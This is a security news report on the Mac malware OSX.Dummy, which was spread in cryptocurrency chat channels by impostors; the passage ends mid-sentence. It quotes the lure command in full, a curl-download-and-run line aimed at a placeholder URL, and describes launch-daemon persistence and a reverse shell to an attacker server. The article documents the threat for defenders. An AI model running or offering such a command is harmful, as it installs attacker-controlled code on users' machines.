Security researchers have spotted a new Mac malware family that’s currently being advertised on cryptocurrency-focused Slack and Discord channels.
The malware’s existence came to light last week when it was discovered by Remco Verhoef, an ISC SANS handler and founder of DutchSec.
Verhoef says he spotted crooks, posing as admins, mods, or other key figures in the cryptocurrency world, posting messages that urged users to type a long command inside their Mac terminal, claiming to help with various problems.
The command (see below) downloaded a hefty 34 MB binary named “script” to the /tmp folder and then ran it as root.
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Malware creates backdoor on infected systems
The “script” file then sets itself as a launch daemon to gain persistence between OS reboots and then creates a Python script that opens a reverse shell to a server located at 220.127.116.11:1337.
The purpose of this reverse shell is to give an attacker access to infected hosts.
“We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency,” said Malwarebytes Mac malware expert Thomas Reed, one of the three security experts who analyzed this new malware.
Malware collects victims’ root passwords
Patrick Wardle, another Mac malware expert who looked at the malware, named it OSX.Dummy. He named it so because the malware asks for the user’s root password when the user…